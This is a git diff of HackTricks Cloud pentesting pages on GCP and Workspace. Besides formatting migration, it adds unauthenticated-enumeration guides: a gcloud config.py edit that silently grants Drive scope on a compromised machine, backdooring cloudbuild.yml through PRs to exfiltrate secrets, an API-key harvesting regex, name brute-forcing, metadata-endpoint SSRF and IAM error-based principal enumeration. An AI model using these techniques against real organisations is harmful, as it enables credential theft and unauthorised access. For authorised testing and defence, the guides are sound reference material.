@@ -116,11 +101,9 @@ By **default** Workspace **users** have the permission to **create new projects*
 
 Therefore, a user can **create a project**, **enable** the **APIs** to enumerate Workspace in his new project and try to **enumerate** it.
 
-{% hint style="danger" %}
-In order for a user to be able to enumerate Workspace he also needs enough Workspace permissions (not every user will be able to enumerate the directory).
-{% endhint %}
+> [!CAUTION]
+> In order for a user to be able to enumerate Workspace he also needs enough Workspace permissions (not every user will be able to enumerate the directory).
 
-{% code overflow="wrap" %}
 ```bash
 # Create project
 gcloud projects create  --name=proj-name
@@ -138,21 +121,20 @@ gcloud identity groups memberships list --group-email=g
 # FROM HERE THE USER NEEDS TO HAVE ENOUGH WORKSPACE ACCESS
 gcloud beta identity groups preview --customer 
 ```
-{% endcode %}
 
 Check **more enumeration in**:
 
-{% content-ref url="../gcp-services/gcp-iam-and-org-policies-enum.md" %}
-[gcp-iam-and-org-policies-enum.md](../gcp-services/gcp-iam-and-org-policies-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-services/gcp-iam-and-org-policies-enum.md
+{{#endref}}
 
 ### Abusing Gcloud credentials
 
 You can find further information about the `gcloud` flow to login in:
 
-{% content-ref url="../gcp-persistence/gcp-non-svc-persistance.md" %}
-[gcp-non-svc-persistance.md](../gcp-persistence/gcp-non-svc-persistance.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-persistence/gcp-non-svc-persistance.md
+{{#endref}}
 
 As explained there, gcloud can request the scope **`https://www.googleapis.com/auth/drive`** which would allow a user to access the drive of the user.\
 As an attacker, if you have compromised **physically** the computer of a user and the **user is still logged** with his account you could login generating a token with access to drive using:
@@ -163,13 +145,12 @@ gcloud auth login --enable-gdrive-access
 
 If an attacker compromises the computer of a user he could also modify the file `google-cloud-sdk/lib/googlecloudsdk/core/config.py` and add in the **`CLOUDSDK_SCOPES`** the scope **`'https://www.googleapis.com/auth/drive'`**:
 
-

+

 
-{% hint style="warning" %}
-Therefore, the next time the user logs in he will create a **token with access to drive** that the attacker could abuse to access the drive. Obviously, the browser will indicate that the generated token will have access to drive, but as the user will call himself the **`gcloud auth login`**, he probably **won't suspect anything.**
-
-To list drive files: **`curl -H "Authorization: Bearer $(gcloud auth print-access-token)" "https://www.googleapis.com/drive/v3/files"`**
-{% endhint %}
+> [!WARNING]
+> Therefore, the next time the user logs in he will create a **token with access to drive** that the attacker could abuse to access the drive. Obviously, the browser will indicate that the generated token will have access to drive, but as the user will call himself the **`gcloud auth login`**, he probably **won't suspect anything.**
+>
+> To list drive files: **`curl -H "Authorization: Bearer $(gcloud auth print-access-token)" "https://www.googleapis.com/drive/v3/files"`**
 
 ## From GWS to GCP
 
@@ -185,19 +166,6 @@ Abusing the **google groups privesc** you might be able to escalate to a group w
 
 ### References
 
-* [https://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover](https://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover)
+- [https://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover](https://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md b/src/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md
similarity index 56%
rename from pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md
rename to src/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md
index ace16c046..0f33fecee 100644
--- a/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md
@@ -1,19 +1,6 @@
 # GCP - Understanding Domain-Wide Delegation
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 This post is the introduction of [https://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover](https://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover) which can be accessed for more details.
 
@@ -23,14 +10,14 @@ Google Workspace's Domain-Wide delegation allows an identity object, either an *
 \
 Google Workspace allows the creation of two main types of global delegated object identities:
 
-* **GWS Applications:** Applications from the Workspace Marketplace can be set up as a delegated identity. Before being made available in the marketplace, each Workspace application undergoes a review by Google to minimize potential misuse. While this does not entirely eliminate the risk of abuse, it significantly increases the difficulty for such incidents to occur.
-* **GCP Service Account:** Learn more about [**GCP Service Accounts here**](../gcp-basic-information/#service-accounts).
+- **GWS Applications:** Applications from the Workspace Marketplace can be set up as a delegated identity. Before being made available in the marketplace, each Workspace application undergoes a review by Google to minimize potential misuse. While this does not entirely eliminate the risk of abuse, it significantly increases the difficulty for such incidents to occur.
+- **GCP Service Account:** Learn more about [**GCP Service Accounts here**](../gcp-basic-information/#service-accounts).
 
 ### **Domain-Wide Delegation: Under the Hood**
 
 This is how a GCP Service Account can access Google APIs on behalf of other identities in Google Workspace:
 
-

+

 
 1. **Identity creates a JWT:** The Identity uses the service account's private key (part of the JSON key pair file) to sign a JWT. This JWT contains claims about the service account, the target user to impersonate, and the OAuth scopes of access to the REST API which is being requested.
 2. **The Identity uses the JWT to request an access token:** The application/user uses the JWT to request an access token from Google's OAuth 2.0 service. The request also includes the target user to impersonate (the user's Workspace email), and the scopes for which access is requested.
@@ -38,17 +25,4 @@ This is how a GCP Service Account can access Google APIs on behalf of other iden
 4. **The Identity uses the access token to call Google APIs**: Now with a relevant access token, the service can access the required REST API. The application uses this access token in the "Authorization" header of its HTTP requests destined for Google APIs. These APIs utilize the token to verify the impersonated identity and confirm it has the necessary authorization.
 5. **Google APIs return the requested data**: If the access token is valid and the service account has appropriate authorization, the Google APIs return the requested data. For example, in the following picture, we’ve leveraged the _users.messages.list_ method to list all the Gmail message IDs associated with a target Workspace user.
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md
new file mode 100644
index 000000000..8dd74fae5
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md
@@ -0,0 +1,18 @@
+# GCP - Unauthenticated Enum & Access
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Public Assets Discovery
+
+One way to discover public cloud resources that belongs to a company is to scrape their webs looking for them. Tools like [**CloudScraper**](https://github.com/jordanpotti/CloudScraper) will scrape the web an search for **links to public cloud resources** (in this case this tools searches `['amazonaws.com', 'digitaloceanspaces.com', 'windows.net', 'storage.googleapis.com', 'aliyuncs.com']`)
+
+Note that other cloud resources could be searched for and that some times these resources are hidden behind **subdomains that are pointing them via CNAME registry**.
+
+## Public Resources Brute-Force
+
+### Buckets, Firebase, Apps & Cloud Functions
+
+- [https://github.com/initstring/cloud_enum](https://github.com/initstring/cloud_enum): This tool in GCP brute-force Buckets, Firebase Realtime Databases, Google App Engine sites, and Cloud Functions
+- [https://github.com/0xsha/CloudBrute](https://github.com/0xsha/CloudBrute): This tool in GCP brute-force Buckets and Apps.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md
new file mode 100644
index 000000000..c2e81cd6c
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md
@@ -0,0 +1,52 @@
+# GCP - API Keys Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## API Keys
+
+For more information about API Keys check:
+
+{{#ref}}
+../gcp-services/gcp-api-keys-enum.md
+{{#endref}}
+
+### OSINT techniques
+
+**Google API Keys are widely used by any kind of applications** that uses from the client side. It's common to find them in for websites source code or network requests, in mobile applications or just searching for regexes in platforms like Github.
+
+The regex is: **`AIza[0-9A-Za-z_-]{35}`**
+
+Search it for example in Github following: [https://github.com/search?q=%2FAIza%5B0-9A-Za-z\_-%5D%7B35%7D%2F\&type=code\&ref=advsearch](https://github.com/search?q=%2FAIza%5B0-9A-Za-z_-%5D%7B35%7D%2F&type=code&ref=advsearch)
+
+### Check origin GCP project - `apikeys.keys.lookup`
+
+This is extremely useful to check to **which GCP project an API key that you have found belongs to**:
+
+```bash
+# If you have permissions
+gcloud services api-keys lookup AIzaSyD[...]uE8Y
+name: projects/5[...]6/locations/global/keys/28d[...]e0e
+parent: projects/5[...]6/locations/global
+
+# If you don't, you can still see the project ID in the error msg
+gcloud services api-keys lookup AIzaSy[...]Qbkd_oYE
+ERROR: (gcloud.services.api-keys.lookup) PERMISSION_DENIED: Permission 'apikeys.keys.lookup' denied on resource project.
+Help Token: ARD_zUaNgNilGTg9oYUnMhfa3foMvL7qspRpBJ-YZog8RLbTjCTBolt_WjQQ3myTaOqu4VnPc5IbA6JrQN83CkGH6nNLum6wS4j1HF_7HiCUBHVN
+- '@type': type.googleapis.com/google.rpc.PreconditionFailure
+  violations:
+  - subject: ?error_code=110002&service=cloudresourcemanager.googleapis.com&permission=serviceusage.apiKeys.getProjectForKey&resource=projects/89123452509
+    type: googleapis.com
+- '@type': type.googleapis.com/google.rpc.ErrorInfo
+  domain: apikeys.googleapis.com
+  metadata:
+    permission: serviceusage.apiKeys.getProjectForKey
+    resource: projects/89123452509
+    service: cloudresourcemanager.googleapis.com
+  reason: AUTH_PERMISSION_DENIED
+```
+
+### Brute Force API endspoints
+
+As you might not know which APIs are enabled in the project, it would be interesting to run the tool [https://github.com/ozguralp/gmapsapiscanner](https://github.com/ozguralp/gmapsapiscanner) and check **what you can access with the API key.**
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md
new file mode 100644
index 000000000..52d1c8097
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md
@@ -0,0 +1,25 @@
+# GCP - App Engine Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## App Engine
+
+For more information about App Engine check:
+
+{{#ref}}
+../gcp-services/gcp-app-engine-enum.md
+{{#endref}}
+
+### Brute Force Subdomains
+
+As mentioned the URL assigned to App Engine web pages is **`.appspot.com`** and if a service name is used it'll be: **`-dot-.appspot.com`**.
+
+As the **`project-uniq-name`** can be set by the person creating the project, they might be not that random and **brute-forcing them could find App Engine web apps exposed by companies**.
+
+You could use tools like the ones indicated in:
+
+{{#ref}}
+./
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md
new file mode 100644
index 000000000..0fd2f5639
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md
@@ -0,0 +1,21 @@
+# GCP - Artifact Registry Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Artifact Registry
+
+For more information about Artifact Registry check:
+
+{{#ref}}
+../gcp-services/gcp-artifact-registry-enum.md
+{{#endref}}
+
+### Dependency Confusion
+
+Check the following page:
+
+{{#ref}}
+../gcp-persistence/gcp-artifact-registry-persistence.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md
new file mode 100644
index 000000000..62964c53a
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md
@@ -0,0 +1,42 @@
+# GCP - Cloud Build Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloud Build
+
+For more information about Cloud Build check:
+
+{{#ref}}
+../gcp-services/gcp-cloud-build-enum.md
+{{#endref}}
+
+### cloudbuild.yml
+
+If you compromise write access over a repository containing a file named **`cloudbuild.yml`**, you could **backdoor** this file, which specifies the **commands that are going to be executed** inside a Cloud Build and exfiltrate the secrets, compromise what is done and also compromise the **Cloud Build service account.**
+
+> [!NOTE]
+> Note that GCP has the option to allow administrators to control the execution of build systems from external PRs via "Comment Control". Comment Control is a feature where collaborators/project owners **need to comment “/gcbrun” to trigger the build** against the PR and using this feature inherently prevents anyone on the internet from triggering your build systems.
+
+For some related information you could check the page about how to attack Github Actions (similar to this):
+
+{{#ref}}
+../../../pentesting-ci-cd/github-security/abusing-github-actions/
+{{#endref}}
+
+### PR Approvals
+
+When the trigger is PR because **anyone can perform PRs to public repositories** it would be very dangerous to just **allow the execution of the trigger with any PR**. Therefore, by default, the execution will only be **automatic for owners and collaborators**, and in order to execute the trigger with other users PRs an owner or collaborator must comment `/gcbrun`.
+
+

+
+> [!CAUTION]
+> Therefore, is this is set to **`Not required`**, an attacker could perform a **PR to the branch** that will trigger the execution adding the malicious code execution to the **`cloudbuild.yml`** file and compromise the cloudbuild execution (note that cloudbuild will download the code FROM the PR, so it will execute the malicious **`cloudbuild.yml`**).
+
+Moreover, it's easy to see if some cloudbuild execution needs to be performed when you send a PR because it appears in Github:
+
+

+
+> [!WARNING]
+> Then, even if the cloudbuild is not executed the attacker will be able to see the **project name of a GCP project** that belongs to the company.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md
new file mode 100644
index 000000000..c8730c80a
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md
@@ -0,0 +1,77 @@
+# GCP - Cloud Functions Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloud Functions
+
+More information about Cloud Functions can be found in:
+
+{{#ref}}
+../gcp-services/gcp-cloud-functions-enum.md
+{{#endref}}
+
+### Brute Force URls
+
+**Brute Force the URL format**:
+
+- `https://-.cloudfunctions.net/`
+
+It's easier if you know project names.
+
+Check this page for some tools to perform this brute force:
+
+{{#ref}}
+./
+{{#endref}}
+
+### Enumerate Open Cloud Functions
+
+With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_misc/-/blob/master/find_open_functions.sh) you can find Cloud Functions that permit unauthenticated invocations.
+
+```bash
+#!/bin/bash
+
+############################
+# Run this tool to find Cloud Functions that permit unauthenticated invocations
+# anywhere in your GCP organization.
+# Enjoy!
+############################
+
+for proj in $(gcloud projects list --format="get(projectId)"); do
+    echo "[*] scraping project $proj"
+
+    enabled=$(gcloud services list --project "$proj" | grep "Cloud Functions API")
+
+    if [ -z "$enabled" ]; then
+	continue
+    fi
+
+
+    for func_region in $(gcloud functions list --quiet --project "$proj" --format="value[separator=','](NAME,REGION)"); do
+        # drop substring from first occurence of "," to end of string.
+        func="${func_region%%,*}"
+        # drop substring from start of string up to last occurence of ","
+        region="${func_region##*,}"
+        ACL="$(gcloud functions get-iam-policy "$func" --project "$proj" --region "$region")"
+
+        all_users="$(echo "$ACL" | grep allUsers)"
+        all_auth="$(echo "$ACL" | grep allAuthenticatedUsers)"
+
+        if [ -z "$all_users" ]
+        then
+              :
+        else
+              echo "[!] Open to all users: $proj: $func"
+        fi
+
+        if [ -z "$all_auth" ]
+        then
+              :
+        else
+              echo "[!] Open to all authenticated users: $proj: $func"
+        fi
+    done
+done
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md
new file mode 100644
index 000000000..71808873c
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md
@@ -0,0 +1,59 @@
+# GCP - Cloud Run Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloud Run
+
+For more information about Cloud Run check:
+
+{{#ref}}
+../gcp-services/gcp-cloud-run-enum.md
+{{#endref}}
+
+### Enumerate Open Cloud Run
+
+With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_misc/-/blob/master/find_open_cloudrun.sh) you can find Cloud Run services that permit unauthenticated invocations.
+
+```bash
+#!/bin/bash
+
+############################
+# Run this tool to find Cloud Run services that permit unauthenticated
+# invocations anywhere in your GCP organization.
+# Enjoy!
+############################
+
+for proj in $(gcloud projects list --format="get(projectId)"); do
+    echo "[*] scraping project $proj"
+
+    enabled=$(gcloud services list --project "$proj" | grep "Cloud Run API")
+
+    if [ -z "$enabled" ]; then
+	continue
+    fi
+
+
+    for run in $(gcloud run services list --platform managed --quiet --project $proj --format="get(name)"); do
+        ACL="$(gcloud run services get-iam-policy $run --platform managed --project $proj)"
+
+        all_users="$(echo $ACL | grep allUsers)"
+        all_auth="$(echo $ACL | grep allAuthenticatedUsers)"
+
+        if [ -z "$all_users" ]
+        then
+              :
+        else
+              echo "[!] Open to all users: $proj: $run"
+        fi
+
+        if [ -z "$all_auth" ]
+        then
+              :
+        else
+              echo "[!] Open to all authenticated users: $proj: $run"
+        fi
+    done
+done
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md
new file mode 100644
index 000000000..f123b614e
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md
@@ -0,0 +1,25 @@
+# GCP - Cloud SQL Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloud SQL
+
+For more infromation about Cloud SQL check:
+
+{{#ref}}
+../gcp-services/gcp-cloud-sql-enum.md
+{{#endref}}
+
+### Brute Force
+
+If you have **access to a Cloud SQL port** because all internet is permitted or for any other reason, you can try to brute force credentials.
+
+Check this page for **different tools to burte-force** different database technologies:
+
+{{#ref}}
+https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force
+{{#endref}}
+
+Remember that with some privileges it's possible to **list all the database users** via GCP API.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md
new file mode 100644
index 000000000..102399e83
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md
@@ -0,0 +1,25 @@
+# GCP - Compute Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Compute
+
+For more information about Compute and VPC (Networking) check:
+
+{{#ref}}
+../gcp-services/gcp-compute-instances-enum/
+{{#endref}}
+
+### SSRF - Server Side Request Forgery
+
+If a web is **vulnerable to SSRF** and it's possible to **add the metadata header**, an attacker could abuse it to access the SA OAuth token from the metadata endpoint. For more info about SSRF check:
+
+{{#ref}}
+https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery
+{{#endref}}
+
+### Vulnerable exposed services
+
+If a GCP instance has a vulnerable exposed service an attacker could abuse it to compromise it.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md
similarity index 65%
rename from pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md
rename to src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md
index 7890c3301..7de36faff 100644
--- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md
+++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md
@@ -1,27 +1,14 @@
 # GCP - IAM, Principals & Org Unauthenticated Enum
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Iam & GCP Principals
 
 For more information check:
 
-{% content-ref url="../gcp-services/gcp-iam-and-org-policies-enum.md" %}
-[gcp-iam-and-org-policies-enum.md](../gcp-services/gcp-iam-and-org-policies-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-services/gcp-iam-and-org-policies-enum.md
+{{#endref}}
 
 ### Is domain used in Workspace?
 
@@ -46,7 +33,7 @@ Another option is to try to setup a Workspace using the domain, if it **complain
 
 To try to setup a Workspace domain follow: [https://workspace.google.com/business/signup/welcome](https://workspace.google.com/business/signup/welcome)
 
-

+

 
 3. **Try to recover the password of an email using that domain**
 
@@ -58,7 +45,6 @@ It's possible to **enumerate valid emails of a Workspace domain and SA emails**
 
 Note that to check them but even if they exist not grant them a permission you can use the type **`serviceAccount`** when it's an **`user`** and **`user`** when it's a **`SA`**:
 
-{% code overflow="wrap" %}
 ```bash
 # Try to assign permissions to user 'unvalid-email-34r434f@hacktricks.xyz'
 # but indicating it's a service account
@@ -75,7 +61,6 @@ gcloud projects add-iam-policy-binding  \
 # Response:
 ERROR: (gcloud.projects.add-iam-policy-binding) INVALID_ARGUMENT: Principal support@hacktricks.xyz is of type "user". The principal should appear as "user:support@hacktricks.xyz". See https://cloud.google.com/iam/help/members/types for additional documentation.
 ```
-{% endcode %}
 
 A faster way to enumerate Service Accounts in know projects is just to try to access to the URL: `https://iam.googleapis.com/v1/projects//serviceAccounts/`\
 For examlpe: `https://iam.googleapis.com/v1/projects/gcp-labs-3uis1xlx/serviceAccounts/appengine-lab-1-tarsget@gcp-labs-3uis1xlx.iam.gserviceaccount.com`
@@ -106,7 +91,6 @@ Note how when the user email was valid the error message indicated that they typ
 
 You can so the **same with Service Accounts** using the type **`user:`** instead of **`serviceAccount:`**:
 
-{% code overflow="wrap" %}
 ```bash
 # Non existent
 gcloud projects add-iam-policy-binding  \
@@ -122,19 +106,5 @@ gcloud projects add-iam-policy-binding  \
 # Response
 ERROR: (gcloud.projects.add-iam-policy-binding) INVALID_ARGUMENT: Principal testing@digital-bonfire-410512.iam.gserviceaccount.com is of type "serviceAccount". The principal should appear as "serviceAccount:testing@digital-bonfire-410512.iam.gserviceaccount.com". See https://cloud.google.com/iam/help/members/types for additional documentation.
 ```
-{% endcode %}
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md
new file mode 100644
index 000000000..26918ddb9
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md
@@ -0,0 +1,20 @@
+# GCP - Source Repositories Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Source Repositories
+
+For more information about Source Repositories check:
+
+{{#ref}}
+../gcp-services/gcp-source-repositories-enum.md
+{{#endref}}
+
+### Compromise External Repository
+
+If an external repository is being used via Source Repositories an attacker could add his malicious code to the repository and:
+
+- If someone uses Cloud Shell to develop the repository it could be compromised
+- if this source repository is used by other GCP services, they could get compromised
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md
new file mode 100644
index 000000000..848b2d0ba
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md
@@ -0,0 +1,73 @@
+# GCP - Storage Unauthenticated Enum
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+## Storage
+
+For more information about Storage check:
+
+{{#ref}}
+../../gcp-services/gcp-storage-enum.md
+{{#endref}}
+
+### Public Bucket Brute Force
+
+The **format of an URL** to access a bucket is **`https://storage.googleapis.com/`.**
+
